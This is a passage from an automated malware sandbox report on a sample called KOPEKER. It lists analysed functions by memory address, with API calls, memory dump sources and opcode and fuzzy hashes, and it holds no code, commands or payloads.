          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: c719d790f51fd484435b120300d23538451cbcfecfa6175b53db1aa823584b9c
          • Instruction ID: af66dc20d128c6208c11c3662e6830ad9582cff200e717503b89883bb05ce2f4
          • Opcode Fuzzy Hash: c719d790f51fd484435b120300d23538451cbcfecfa6175b53db1aa823584b9c
          • Instruction Fuzzy Hash: 0DB1EE8692A70689FFB32160C4D071D6980DF16385F718F3BC861F65E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040AB51, Relevance: 1.7, APIs: 1, Instructions: 429memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 9454a8b4a0b41786795c4a058bca258d81a20826dd6a6873cbfa9acbc3e4580e
          • Instruction ID: 44a15e2f0c9a686368b58bb92f8158bbc41dfa58cf5ad0bf1b04a6f9675342bc
          • Opcode Fuzzy Hash: 9454a8b4a0b41786795c4a058bca258d81a20826dd6a6873cbfa9acbc3e4580e
          • Instruction Fuzzy Hash: 80C10F8292A74649EFB32160C4D071DA980DF16385F758F3BCC61F64E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040AC80, Relevance: 1.7, APIs: 1, Instructions: 421memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: b60098256ef85946f95035e2607876c187471579ba805e8fea38e21b3f9ca6c7
          • Instruction ID: aed66e3f114cfadcf6687d7876cfcdd2d0a3b10c3d6f1779c5b1f2089b3e7397
          • Opcode Fuzzy Hash: b60098256ef85946f95035e2607876c187471579ba805e8fea38e21b3f9ca6c7
          • Instruction Fuzzy Hash: C9B1EC8692A70689FFB32160C4D071DA980DF16385F718F3BC861F55E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040AD04, Relevance: 1.6, APIs: 1, Instructions: 381memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 3ee84683e898d7f97b24803476362539db565643b441e09f72e2b467bd263eac
          • Instruction ID: 1faef6ae18adfc23e3ca772582df21a3915d474c18b073cea7e28080cda505fa
          • Opcode Fuzzy Hash: 3ee84683e898d7f97b24803476362539db565643b441e09f72e2b467bd263eac
          • Instruction Fuzzy Hash: 13B1ED8292A70689EFB32160C4D075DA580DF16385F718F3BCD61F64E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040AD9A, Relevance: 1.6, APIs: 1, Instructions: 360memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 71d91d8237c65cf12af684d45281e2ac5e0af9e060951be7a73438412eef3ee0
          • Instruction ID: 8b72db206f40b174809f02f999e4f40d758e84204e42c0f942e6e01184808d1f
          • Opcode Fuzzy Hash: 71d91d8237c65cf12af684d45281e2ac5e0af9e060951be7a73438412eef3ee0
          • Instruction Fuzzy Hash: 66A1DC8292A70689EFB321A0C4D071DA580DF16385F718F3BCD61F54E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Function 00621C82, Relevance: 3.1, Strings: 2, Instructions: 629COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: @$E
          • API String ID: 0-2021982315
          • Opcode ID: d511bee284bccd0e0452929ce65a22176f475abd7b73a1d09e3953d62adb423a
          • Instruction ID: 36a9e00b63f566d9cad302615e497b096e8e3c87a7adce58f83d8082a6c9ba4a
          • Opcode Fuzzy Hash: d511bee284bccd0e0452929ce65a22176f475abd7b73a1d09e3953d62adb423a
          • Instruction Fuzzy Hash: DE126871344A26BFEB614E14ECA1BE573A3FF12350F644228FD869B2C1C77998859F81
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00626804, Relevance: 1.9, Strings: 1, Instructions: 660COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: cbc394d5ffd9431769bb49e5f3198f255672f9d19683ba7d3762eb1e43adcfac
          • Instruction ID: 4a4590ceb4314ed299384e09c1a1a76fb08ef020715ce9647b6057b28c9c7167
          • Opcode Fuzzy Hash: cbc394d5ffd9431769bb49e5f3198f255672f9d19683ba7d3762eb1e43adcfac
          • Instruction Fuzzy Hash: 2B227970704B16AFEB218E24DC95BE97793EF12320F648219FE969B2D1D3748882DF11
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00626806, Relevance: 1.4, Strings: 1, Instructions: 178COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: c7d9bf124ec13cfa484f54e6bfe0ab855aee67119eb51f608b2de9ceb1df7b38
          • Instruction ID: 01f0c1da3cdcf1c2afe2f4faf10e268bd6f39d74d989c3f8f7192b983c33a68a
          • Opcode Fuzzy Hash: c7d9bf124ec13cfa484f54e6bfe0ab855aee67119eb51f608b2de9ceb1df7b38
          • Instruction Fuzzy Hash: 7F512A30904B568EDB24CF28D4947D577D39F23360F59C39AE9A68B2E6D3358486CB12
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00626843, Relevance: 1.4, Strings: 1, Instructions: 172COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: 5ebdc0c87d5fe53f236481aadd97c6025533517423fd50411d1e9ab3a59b0f09
          • Instruction ID: 305addc645b0eb365b3c8a29f2909208f7344530eff3a5c4e7cafc8e8f2d5825
          • Opcode Fuzzy Hash: 5ebdc0c87d5fe53f236481aadd97c6025533517423fd50411d1e9ab3a59b0f09
          • Instruction Fuzzy Hash: B7513930904B568EDB21CF28D4D47D57BD39F13360F59C399E9A68B2E6D3358482CB12
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00626892, Relevance: 1.4, Strings: 1, Instructions: 147COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: 035f9950b30dc700e4c48e9de659fa80b4263306acca640b574a98a64e154485
          • Instruction ID: 7e02e2433268378cfe1ae8bd95363756ce464122ef25687f98b1bb3054bc3fb3
          • Opcode Fuzzy Hash: 035f9950b30dc700e4c48e9de659fa80b4263306acca640b574a98a64e154485
          • Instruction Fuzzy Hash: 84510F30908BA68DDF218F28D4D47D5BA935F13320F59C39AE9D68B2D6D3758486CB13
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006268CF, Relevance: 1.4, Strings: 1, Instructions: 138COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: 4f26ceee98c7cb7ea1c7ff1b2880e3b343d496b07eff0ce17344e68bad209304
          • Instruction ID: d606d299bcdda82635c5b99be7c823fd54bd45947e2fd7dd71c87c9389aebb60
          • Opcode Fuzzy Hash: 4f26ceee98c7cb7ea1c7ff1b2880e3b343d496b07eff0ce17344e68bad209304
          • Instruction Fuzzy Hash: 38411E30904BA68DDF318A28D4D57D57A938F23320F59C399E9E68B2E6D36584C7CB13
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0062690E, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: afd36e1979a87de4e2de7d0e8884b18112f52ccd3dbe11407cc754b02c951b24
          • Instruction ID: 64cb37039593b9bb9ffc350b558806a34f5a28da1014fe8b30c8e74428a2e2f5
          • Opcode Fuzzy Hash: afd36e1979a87de4e2de7d0e8884b18112f52ccd3dbe11407cc754b02c951b24
          • Instruction Fuzzy Hash: 1B411B30908B968EDF358B28D4D4795BAD39F23320F58C399D9E68B2E7D3654487CB12
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00626907, Relevance: 1.4, Strings: 1, Instructions: 127COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: 43747a123f727a2e7a8dcc1e6363bdb571cb192f90702f9f9a628a56aa88c626
          • Instruction ID: 638b921c625af7143ff91fdecd2b1c91e95502426660f1605e0c19d8dc7bbbb0
          • Opcode Fuzzy Hash: 43747a123f727a2e7a8dcc1e6363bdb571cb192f90702f9f9a628a56aa88c626
          • Instruction Fuzzy Hash: B441ED30904B968DDF318A28D4D47D5BA939F23320F59C399E9E68B2E6D3658487CB13
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00626966, Relevance: 1.4, Strings: 1, Instructions: 111COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: c8c9a78ab6739b7deb19c175e3ee17b69165d918e49d2fb2e9edbc3f61e5f345
          • Instruction ID: f285ecf9fbcb0b67aba24c018ff1c4b3cd4cb73873d02e9e5caf53b5479bb0e3
          • Opcode Fuzzy Hash: c8c9a78ab6739b7deb19c175e3ee17b69165d918e49d2fb2e9edbc3f61e5f345
          • Instruction Fuzzy Hash: E731ED30904B668EDF358B28D4D43D5BA939F13320F59C39AD9A68E2E7D3754487CB12
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0062699F, Relevance: 1.4, Strings: 1, Instructions: 105COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          • Opcode ID: 127551437e1110b2373d9eb223a6a556738c970d587fb5c8eddd5f3fc30e71c6
          • Instruction ID: 41b5d52d17cf82d15aac9d63b018bb1c8b072a65192aaa85345af0d9614b0b35
          • Opcode Fuzzy Hash: 127551437e1110b2373d9eb223a6a556738c970d587fb5c8eddd5f3fc30e71c6
          • Instruction Fuzzy Hash: 33314C31844B668EDF348E24D4E13E5B6938F23321F18C39AEDA28A2D6D3654487CF12
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00622295, Relevance: 1.3, Strings: 1, Instructions: 81COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          • Opcode ID: 24f5b4601dd673853ade7bd70d774781980b92a7e5bf9071b66d87e7c7f5ebe7
          • Instruction ID: acc160054a6d50d1752f9bb85dbd6ccf740d43fe22529e3138fc6fde42fd22d0
          • Opcode Fuzzy Hash: 24f5b4601dd673853ade7bd70d774781980b92a7e5bf9071b66d87e7c7f5ebe7
          • Instruction Fuzzy Hash: A1214C30344B13EEFB315A14AC65BE473A3BF01740FA04229ED865B1D1D3659982DE06
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00622286, Relevance: 1.3, Strings: 1, Instructions: 79COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          • Opcode ID: 10f914a4ceb2ba9181488fbb1cfc45b8d9c8d8580f0482dbc87df32a64ee3c2d
          • Instruction ID: 356fcddea90f4a86c22d5a6b2ebb4ad53d472ec0934050dc584783c82be6b0fc
          • Opcode Fuzzy Hash: 10f914a4ceb2ba9181488fbb1cfc45b8d9c8d8580f0482dbc87df32a64ee3c2d
          • Instruction Fuzzy Hash: 4F219B30248752EFFB325E149CA2BE537A3AF02750F5441A9ED819F1D2C3694982CE16
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006222C7, Relevance: 1.3, Strings: 1, Instructions: 64COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          • Opcode ID: 3a0e449632756c20bf02ef51d6bc866d9d1e84675c23ebcfbef0b73dd4a958d6
          • Instruction ID: 54aa708a7a17f1aa6d9efd3c0f1ecd73b9204e4e10ffa041c9c0c28949ee08ed
          • Opcode Fuzzy Hash: 3a0e449632756c20bf02ef51d6bc866d9d1e84675c23ebcfbef0b73dd4a958d6
          • Instruction Fuzzy Hash: 22116F30384B17EEFB315914ADA6FE522635F42B90FA04224FE815B1D5D3AA4986DD0A
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006222F6, Relevance: 1.3, Strings: 1, Instructions: 54COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          • Opcode ID: 3984201636338d99c141c89d1646a662de93135f559b93d9c08832f57808072d
          • Instruction ID: bf44b347e1fbec911ad5d390ecae8aa199106b80932e67ceea5437c5e54796da
          • Opcode Fuzzy Hash: 3984201636338d99c141c89d1646a662de93135f559b93d9c08832f57808072d
          • Instruction Fuzzy Hash: 8E016830384B16EEFB304E146D96FE827A36F02F40F604125FE815F1D1D3A98A49DD06
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00627309, Relevance: .5, Instructions: 497COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b5571888789e66cd4d1d71f793725497d1bd8a842316a3086c1a557aa10ec9a3
          • Instruction ID: d96621a86859b0f6734765d705695aaab7b338070452f5a41f205eeb36128e0e
          • Opcode Fuzzy Hash: b5571888789e66cd4d1d71f793725497d1bd8a842316a3086c1a557aa10ec9a3
          • Instruction Fuzzy Hash: 26F17D71308B26EFFB214E14EDA5FE97663AF51350F604129EE86972C0D37988C6EE41
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00621226, Relevance: .4, Instructions: 360COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e9251c34cac2432bea757a9375d1d6b66d96eadc6c4ff85603412597bd365b95
          • Instruction ID: 8a9ad059cce047ceb20617710232cebf59eecfd00a46e18de4e06d2e0a95b37a
          • Opcode Fuzzy Hash: e9251c34cac2432bea757a9375d1d6b66d96eadc6c4ff85603412597bd365b95
          • Instruction Fuzzy Hash: BAB14671340B1ABFFB710E14DDA1BE93663AF02750FA04228FE859B2C1D3B989859E45
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0062266B, Relevance: .3, Instructions: 328COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 51ce6da21b8b24598824a0524eb7be5243da8fd6827af2720d9368bd8796c2bc
          • Instruction ID: 53b2cdcf4671729587b4bbe1fd91316d3a3f81598103571f42f1b1c685b62cba
          • Opcode Fuzzy Hash: 51ce6da21b8b24598824a0524eb7be5243da8fd6827af2720d9368bd8796c2bc
          • Instruction Fuzzy Hash: CEA16AB134071ABFFB610E14DDA5BE97663FF01750F604228FE85AB2C1D3B988859E44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006226AB, Relevance: .3, Instructions: 315COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 427d2cca4c0d498f28fa01051d80ebb82cdec0c2f4a727c1a70db31303f6ff53
          • Instruction ID: c8e4f04f1e7d6e7db2a408539be93b9e8f50dda31469e3b105a3a8a5ed1f8ae8
          • Opcode Fuzzy Hash: 427d2cca4c0d498f28fa01051d80ebb82cdec0c2f4a727c1a70db31303f6ff53
          • Instruction Fuzzy Hash: 2EA17AB1340B1ABFFB610E14DDA5BE97667FF01350F604228FE85AB2C1C3B988859E44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00622733, Relevance: .3, Instructions: 288COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 83cd62af16d12041b92c08669525e84cba548431c80a344c330c7fa74a1412af
          • Instruction ID: 3df6984ef660726307db34505ebadd3bf5d499b0929c7c899e48a735f8a8aac5
          • Opcode Fuzzy Hash: 83cd62af16d12041b92c08669525e84cba548431c80a344c330c7fa74a1412af
          • Instruction Fuzzy Hash: 2F9158B1300B1ABFFB614E14DDA1BE97667EF15350F604228FE85AB2C1C3B998C59E44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040E33C, Relevance: .3, Instructions: 279COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a2480d7b8da302363b478be973ad5d8ad84d3b969cbfdae0ef94fcfcac566985
          • Instruction ID: ad88475046bbddf3c178c495aedf2017a7d62402b37316b8c653ba06ede73d66
          • Opcode Fuzzy Hash: a2480d7b8da302363b478be973ad5d8ad84d3b969cbfdae0ef94fcfcac566985
          • Instruction Fuzzy Hash: EC51247244E3C29FD3038B709CA53917FB0AF17215F1A4ADBC080CF0A3D269595AC7A6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00622787, Relevance: .3, Instructions: 263COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 09cda8fa39dfa7e12696c71e3c98344665db786bd5bd349f9995d846de1d5702
          • Instruction ID: 7970ec901263268dce5583701bd82b53346cbf8e4a72245489961740401700bb
          • Opcode Fuzzy Hash: 09cda8fa39dfa7e12696c71e3c98344665db786bd5bd349f9995d846de1d5702
          • Instruction Fuzzy Hash: A58156B1200A1ABFFB614F14DDA2BE93667EF15354F604228FE859B2C1C3B988C59B44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006227BE, Relevance: .3, Instructions: 255COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a4a2a1a26733a88b8a650030b49a62f493d61cedfa0326e3b5126075c1876ab9
          • Instruction ID: 0f4ae7f7f3b8e40174b3086685bedf2ffbc2cfff82157ecc46ebcfd1140958dc
          • Opcode Fuzzy Hash: a4a2a1a26733a88b8a650030b49a62f493d61cedfa0326e3b5126075c1876ab9
          • Instruction Fuzzy Hash: 3A8156B0200B1ABFFB614F14DDA5BE97A67EF11350F604228FE859B2C1C3B988C59B45
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006227EB, Relevance: .2, Instructions: 250COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1472901c055041201897370d9b244e5c8273a61ac4545845f407c91fba43a3e4
          • Instruction ID: 73fab4b78ff1529fe3317c916a1d83ca79c5ea7bb60d4591588a2d9004a40c28
          • Opcode Fuzzy Hash: 1472901c055041201897370d9b244e5c8273a61ac4545845f407c91fba43a3e4
          • Instruction Fuzzy Hash: 808136B1300A1ABFFB614E14DDA6BE97667FF15350F604228FE859B2C0C3B998C59A44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0062282E, Relevance: .2, Instructions: 235COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ffec8fd1ca22e9ae8aea45bd2613572a6049ef47a4f6bb51cabfbce5222ebee9
          • Instruction ID: c04b667054b5e654b9cc64284a38bc63753db130c020aa91a465715bce73deed
          • Opcode Fuzzy Hash: ffec8fd1ca22e9ae8aea45bd2613572a6049ef47a4f6bb51cabfbce5222ebee9
          • Instruction Fuzzy Hash: 327126B4200A1ABFFB714E14DDA6BE97657FF15350F504128FE859A2C0C3B998C4AA44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006228B7, Relevance: .2, Instructions: 214COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 257e3f75a27ded709859a853b186abb605172b026219d696e5535d06c3183047
          • Instruction ID: 35c800a4fba4eb240eef0666e0ffc3f461345159ad2afe601e2787d170d820d7
          • Opcode Fuzzy Hash: 257e3f75a27ded709859a853b186abb605172b026219d696e5535d06c3183047
          • Instruction Fuzzy Hash: 166136B434061ABFFBB10E14EDA2BE93657EF05710F600128FE859A1D0C3B98CC4AE44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0062290E, Relevance: .2, Instructions: 191COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1f72edd6dc063735f49c01f6efa4bf7919f7ffcf70280dc0a2db789e30e78208
          • Instruction ID: 23c3c89b1fc76096423dfd51a20a7cecd280503051b5bff793359a32cf2ddfc0
          • Opcode Fuzzy Hash: 1f72edd6dc063735f49c01f6efa4bf7919f7ffcf70280dc0a2db789e30e78208
          • Instruction Fuzzy Hash: 0C5137B434061ABFFBB20E54EDA1BE93617EF05710F904128FE85AA1D1C7B98DC4AE44
